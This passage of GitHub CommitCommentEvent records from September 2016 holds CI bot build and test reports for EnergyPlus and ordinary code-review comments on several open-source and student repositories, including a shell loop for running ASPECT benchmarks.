href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.13%25-green.svg)</a>\n"}},"created_at":"2016-09-21T00:19:54Z"}
{"id":"4593313217","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106356,"position":null,"line":null,"path":null,"commit_id":"33292be60050185d98dcfc765c1d5972362ff6b9","created_at":"2016-09-21T00:20:26Z","updated_at":"2016-09-21T00:20:26Z","body":"ASIHP-validation1 (shenb) - i386-Windows-7-VisualStudio-12: OK (2338 of 2339 tests passed, 1 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T00:20:26Z"}
{"id":"4593313721","type":"CommitCommentEvent","actor":{"login":"ojh3636"},"repo":{"name":"sparcs-kaist/heartbeat"},"payload":{"comment":{"id":19106357,"position":null,"line":null,"path":null,"commit_id":"c68ee83c875444a31a8b11f39891f4f362974752","created_at":"2016-09-21T00:20:34Z","updated_at":"2016-09-21T00:20:34Z","body":"fail --> Mail to wheel\r\n\r\n\r\nAnd save the result??? in file?? or remove?"}},"created_at":"2016-09-21T00:20:34Z"}
{"id":"4593314202","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106358,"position":null,"line":null,"path":null,"commit_id":"f0ad4d118f63f5334be54fab1f77be147491ee5e","created_at":"2016-09-21T00:20:43Z","updated_at":"2016-09-21T00:20:43Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T00:20:43Z"}
{"id":"4593315617","type":"CommitCommentEvent","actor":{"login":"pichelen"},"repo":{"name":"pichelen/hello-world"},"payload":{"comment":{"id":19106362,"position":null,"line":null,"path":null,"commit_id":"5133b070c7103aaf4131402213b89a11ea12ad11","created_at":"2016-09-21T00:21:06Z","updated_at":"2016-09-21T00:21:06Z","body":"This is another commit for a practice, but this time adding a comment in here."}},"created_at":"2016-09-21T00:21:06Z"}
{"id":"4593318850","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19106367,"position":null,"line":null,"path":null,"commit_id":"94710aab340a3918fd1e1b9ba475f19277ac67c0","created_at":"2016-09-21T00:22:04Z","updated_at":"2016-09-21T00:22:04Z","body":"I think it should be default on, helpful when I make new bugs or multiple changes directly in the bz interface."}},"created_at":"2016-09-21T00:22:04Z"}
{"id":"4593319819","type":"CommitCommentEvent","actor":{"login":"hlokavarapu"},"repo":{"name":"EGP-CIG-REU/aspect"},"payload":{"comment":{"id":19106370,"position":null,"line":null,"path":null,"commit_id":"a40d925848cf51f88ba5dee13a89a36c16d36a90","created_at":"2016-09-21T00:22:23Z","updated_at":"2016-09-21T00:22:23Z","body":"To compile the test case:\r\n\r\n\r\n```\r\ncp -r <path_to_aspect>/benchmarks/solkz_richardson .\r\ncd solk_richardson\r\ncmake -DAspect_DIR=<path_to_top_directory_of_aspect_build> .\r\nmake\r\n\r\nfor i in 4 5 6 7 8; do sed -i \"s/Initial global refinement.*/Initial global refinement = $((i))/\" solkz_Q2_Q1.prm && sed -i \"s/Input file name of interpolated data.*/Input file name of interpolated data = interpolated_values_$((i-1))_onto_$((i))/\" solkz_Q2_Q1.prm && sed -i \"s/ Output file name of interpolated data.*/ Output file name of interpolated data =  interpolated_values_$((i))_onto_$((i+1))/\" solkz_Q2_Q1.prm && mpirun -np 4 aspect solkz_Q2_Q1.prm ; done\r\n\r\n```\r\n\r\nThe last command iterates over global refinement levels 4,5,6,7, and 8, modifies the parameter file appropriately, and lastly, runs aspect."}},"created_at":"2016-09-21T00:22:23Z"}
{"id":"4593320542","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106372,"position":6,"line":21,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"0398a11cbb8e745220ac5deb20efb97245b42061","created_at":"2016-09-21T00:22:38Z","updated_at":"2016-09-21T00:22:38Z","body":"This condition is repeated 8 times. If that condition changes, you have to edit this 8 times. \r\n\r\nPull this into it's own method, something like `self.isWithinBounds()`. That way if this logic changes, you only have to edit `isWithinBounds` once."}},"created_at":"2016-09-21T00:22:38Z"}
{"id":"4593325189","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":19106383,"position":null,"line":null,"path":null,"commit_id":"1695f3998606f1f474426c2fede356a5ad253ec0","created_at":"2016-09-21T00:24:02Z","updated_at":"2016-09-21T00:24:02Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#d6E_PdFFRkKOcRpFKVDfxQ"}},"created_at":"2016-09-21T00:24:02Z"}
{"id":"4593325439","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106386,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-21T00:24:08Z","updated_at":"2016-09-21T00:24:08Z","body":"ASIHP-validation1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1765 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-21T00:24:08Z"}
{"id":"4593326597","type":"CommitCommentEvent","actor":{"login":"davecg"},"repo":{"name":"davecg/dsp"},"payload":{"comment":{"id":19106388,"position":null,"line":null,"path":null,"commit_id":"41ceee8fed20236497a5ca96d851ed0865cc6a2d","created_at":"2016-09-21T00:24:30Z","updated_at":"2016-09-21T00:24:30Z","body":"Thanks! :)"}},"created_at":"2016-09-21T00:24:30Z"}
{"id":"4593328093","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106391,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-21T00:25:00Z","updated_at":"2016-09-21T00:25:00Z","body":"ASIHP-validation1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T00:25:00Z"}
{"id":"4593331509","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106399,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-21T00:25:59Z","updated_at":"2016-09-21T00:25:59Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T00:25:59Z"}
{"id":"4593331887","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106400,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-21T00:26:07Z","updated_at":"2016-09-21T00:26:07Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T00:26:07Z"}
{"id":"4593332223","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106401,"position":107,"line":86,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"0398a11cbb8e745220ac5deb20efb97245b42061","created_at":"2016-09-21T00:26:14Z","updated_at":"2016-09-21T00:26:14Z","body":"Actually, if you pulled the bounds check to right above here, then you only have to make 1 call to it, instead of once for each move method."}},"created_at":"2016-09-21T00:26:14Z"}
{"id":"4593332267","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19106402,"position":100,"line":229,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T00:26:15Z","updated_at":"2016-09-21T00:26:15Z","body":"That is a valid point. I guess we should have v6 support always enabled in the glibc we are compiling against, so it shouldn't matter even if the kernel doesn't have v6 support enabled?"}},"created_at":"2016-09-21T00:26:15Z"}
{"id":"4593332488","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106404,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-21T00:26:19Z","updated_at":"2016-09-21T00:26:19Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-21T00:26:19Z"}
{"id":"4593332813","type":"CommitCommentEvent","actor":{"login":"CarloWood"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19106405,"position":null,"line":null,"path":null,"commit_id":"900026818b772ef848749e366b722817b3fc6fc4","created_at":"2016-09-21T00:26:25Z","updated_at":"2016-09-21T00:26:25Z","body":"Has this been fixed by #5491 or are there still issues left?\r\nThanks. Sorry for the late reaction here, I missed the comments here until I (finally!) read my email again :/ "}},"created_at":"2016-09-21T00:26:25Z"}
{"id":"4593332988","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106406,"position":124,"line":103,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"0398a11cbb8e745220ac5deb20efb97245b42061","created_at":"2016-09-21T00:26:28Z","updated_at":"2016-09-21T00:26:28Z","body":"You could move `BatteryReduction()` out of each of the move methods here too."}},"created_at":"2016-09-21T00:26:28Z"}
{"id":"4593333105","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106407,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-21T00:26:31Z","updated_at":"2016-09-21T00:26:31Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-21T00:26:31Z"}
{"id":"4593333542","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106408,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-21T00:26:39Z","updated_at":"2016-09-21T00:26:39Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T00:26:39Z"}
{"id":"4593333946","type":"CommitCommentEvent","actor":{"login":"jtanx"},"repo":{"name":"fontforge/fontforge"},"payload":{"comment":{"id":19106409,"position":5,"line":28,"path":"travis-scripts/script_linux.sh","commit_id":"aa2dd8f10f7046c1085d40eb1315d11206712947","created_at":"2016-09-21T00:26:47Z","updated_at":"2016-09-21T00:26:47Z","body":"There's not too many new builds yet, but looking at the logs, it  goes from around 17-19 minutes to 16-17 minutes.\r\n\r\nAnyway, considering that we were building with silent rules turned off before, and considering the sheer number of warnings generated, I don't think readability concerns due to parallel compilation count for a lot."}},"created_at":"2016-09-21T00:26:47Z"}
{"id":"4593334759","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106416,"position":4,"line":8,"path":"Assignment_2_Vacuum_Cleaner/world/Test.java","commit_id":"0398a11cbb8e745220ac5deb20efb97245b42061","created_at":"2016-09-21T00:27:01Z","updated_at":"2016-09-21T00:27:01Z","body":"👍 on removing whitespace!"}},"created_at":"2016-09-21T00:27:01Z"}
{"id":"4593336178","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106419,"position":5,"line":21,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"d962c83c36add71e85ce01e2d2ec66c586085052","created_at":"2016-09-21T00:27:29Z","updated_at":"2016-09-21T00:27:29Z","body":"Ah, I see you had to update this 8 times. ;)"}},"created_at":"2016-09-21T00:27:29Z"}
{"id":"4593337581","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106424,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-21T00:27:56Z","updated_at":"2016-09-21T00:27:56Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T00:27:56Z"}
{"id":"4593337993","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106425,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-21T00:28:03Z","updated_at":"2016-09-21T00:28:03Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T00:28:03Z"}
{"id":"4593338161","type":"CommitCommentEvent","actor":{"login":"andrewdarmawan"},"repo":{"name":"andrewdarmawan/tncontract"},"payload":{"comment":{"id":19106426,"position":null,"line":null,"path":null,"commit_id":"a98f5e085e150c0e7e6bb325bde83cff19151c80","created_at":"2016-09-21T00:28:06Z","updated_at":"2016-09-21T00:28:06Z","body":"Note that the tensor array_1d[end] will not be contracted (only the tensors up to array_1d[end-1]). Perhaps make this clearer in the docstring. "}},"created_at":"2016-09-21T00:28:06Z"}
{"id":"4593338611","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106427,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-21T00:28:15Z","updated_at":"2016-09-21T00:28:15Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-21T00:28:15Z"}
{"id":"4593339273","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106429,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-21T00:28:27Z","updated_at":"2016-09-21T00:28:27Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.svg)</a>\n"}},"created_at":"2016-09-21T00:28:27Z"}
{"id":"4593339580","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106432,"position":84,"line":145,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"d962c83c36add71e85ce01e2d2ec66c586085052","created_at":"2016-09-21T00:28:33Z","updated_at":"2016-09-21T00:28:33Z","body":"Indentation."}},"created_at":"2016-09-21T00:28:33Z"}
{"id":"4593339708","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106433,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-21T00:28:35Z","updated_at":"2016-09-21T00:28:35Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T00:28:35Z"}
{"id":"4593340346","type":"CommitCommentEvent","actor":{"login":"asridharan"},"repo":{"name":"lava/mesos"},"payload":{"comment":{"id":19106434,"position":212,"line":376,"path":"3rdparty/stout/include/stout/ip.hpp","commit_id":"8b83489a5cd5e3fe81c98cae3dfe58a7e945376f","created_at":"2016-09-21T00:28:47Z","updated_at":"2016-09-21T00:28:47Z","body":"But whether you count from the LSB or the MSB matters right? I would suggest keep the ntohl."}},"created_at":"2016-09-21T00:28:47Z"}
{"id":"4593348445","type":"CommitCommentEvent","actor":{"login":"shavenking"},"repo":{"name":"jason200453/bank"},"payload":{"comment":{"id":19106462,"position":null,"line":null,"path":null,"commit_id":"0b24b5bc5fcf03fd72c3fe5e27a1ffe771890a4d","created_at":"2016-09-21T00:31:23Z","updated_at":"2016-09-21T00:31:23Z","body":"這個 test 要加 assertException"}},"created_at":"2016-09-21T00:31:23Z"}
{"id":"4593348965","type":"CommitCommentEvent","actor":{"login":"shavenking"},"repo":{"name":"jason200453/bank"},"payload":{"comment":{"id":19106464,"position":null,"line":null,"path":null,"commit_id":"0b24b5bc5fcf03fd72c3fe5e27a1ffe771890a4d","created_at":"2016-09-21T00:31:34Z","updated_at":"2016-09-21T00:31:34Z","body":"mock 的部分沒錯"}},"created_at":"2016-09-21T00:31:34Z"}
{"id":"4593348992","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106465,"position":14,"line":29,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"9ef494b5bb1615b730b7ab05d0404ff6958e4fd3","created_at":"2016-09-21T00:31:35Z","updated_at":"2016-09-21T00:31:35Z","body":"Where are these magic numbers? You might want to pull this into a well named constant."}},"created_at":"2016-09-21T00:31:35Z"}
{"id":"4593353529","type":"CommitCommentEvent","actor":{"login":"jeaye"},"repo":{"name":"NigoroJr/color_coded-colorschemes"},"payload":{"comment":{"id":19106479,"position":null,"line":null,"path":null,"commit_id":"7030593e9e85e0f3106edf33d5070d15b5c2e52f","created_at":"2016-09-21T00:33:04Z","updated_at":"2016-09-21T00:33:04Z","body":"This is awesome to see. Nice work."}},"created_at":"2016-09-21T00:33:04Z"}
{"id":"4593354035","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106480,"position":81,"line":90,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"9ef494b5bb1615b730b7ab05d0404ff6958e4fd3","created_at":"2016-09-21T00:33:15Z","updated_at":"2016-09-21T00:33:15Z","body":"Is it ok for this to get thrown?"}},"created_at":"2016-09-21T00:33:15Z"}
{"id":"4593354903","type":"CommitCommentEvent","actor":{"login":"manlycode"},"repo":{"name":"sunnlamp/artificialIntelligence"},"payload":{"comment":{"id":19106485,"position":102,"line":131,"path":"Assignment_2_Vacuum_Cleaner/world/Agent.java","commit_id":"9ef494b5bb1615b730b7ab05d0404ff6958e4fd3","created_at":"2016-09-21T00:33:33Z","updated_at":"2016-09-21T00:33:33Z","body":"Indentation."}},"created_at":"2016-09-21T00:33:33Z"}
{"id":"4593355144","type":"CommitCommentEvent","actor":{"login":"paphonbth"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19106489,"position":5,"line":0,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/ui/SettingsActivity.java","commit_id":"58de99f2ec7f81e62eadd76e1db329839dbdde1b","created_at":"2016-09-21T00:33:39Z","updated_at":"2016-09-21T00:33:39Z","body":"Oops. Forgot to do that."}},"created_at":"2016-09-21T00:33:39Z"}
{"id":"4593358941","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"TaskClusterRobot/hooks-testing"},"payload":{"comment":{"id":19106498,"position":null,"line":null,"path":null,"commit_id":"795f050fcd34a255d50a847c1a6f40eeafb37c42","created_at":"2016-09-21T00:34:54Z","updated_at":"2016-09-21T00:34:54Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#JJSO_o4USv-hjCQ_D7RBgg"}},"created_at":"2016-09-21T00:34:54Z"}
{"id":"4593359497","type":"CommitCommentEvent","actor":{"login":"sailfish009"},"repo":{"name":"sailfish009/SDL2"},"payload":{"comment":{"id":19106500,"position":null,"line":null,"path":null,"commit_id":"b6407c8396ed94d60bbbbe5aa970dbd5d45cf325","created_at":"2016-09-21T00:35:05Z","updated_at":"2016-09-21T00:35:05Z","body":"this patch needed when i build static sdl2 library.\r\nshared sdl2 should not be patched."}},"created_at":"2016-09-21T00:35:05Z"}
